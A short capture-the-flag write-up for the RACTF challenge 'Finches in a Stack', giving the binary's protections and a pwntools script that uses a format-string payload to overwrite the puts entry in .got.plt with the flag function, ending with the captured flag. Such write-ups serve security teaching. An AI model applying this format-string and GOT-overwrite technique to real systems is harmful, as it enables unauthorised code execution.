Rating:

# Finches in a Stack

###
`Exploit the service to get the flag.`

```
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
```

This task about canary abuse but it is possible to do it via `.got`
address rewrite.

* find out with dbg where the buffer starts
* change 'puts' on 'flag' because `.got.plt` is possible to rewrite

```python
#!/usr/bin/env python3
from pwn import *

context.log_level = 'debug'
debug = 0

if debug:
io = remote('88.198.219.20', 31360)
else:
io = process(['./fias'])
binary = ELF('./fias')
flag = binary.symbols['flag']
# .got.plt puts address
puts = 0x0804c01c

payload = b''
# 6 pointer to string buffer
payload += fmtstr_payload(6, {puts: flag})

io.recvuntil("Hi! What's your name? ")
io.sendline(payload)

io.interactive()
#ractf{St4ck_C4n4ry_FuN!}
```

Original writeup (https://github.com/fr0st61te/ctf/tree/master/6.6.2020_RACTF/fias).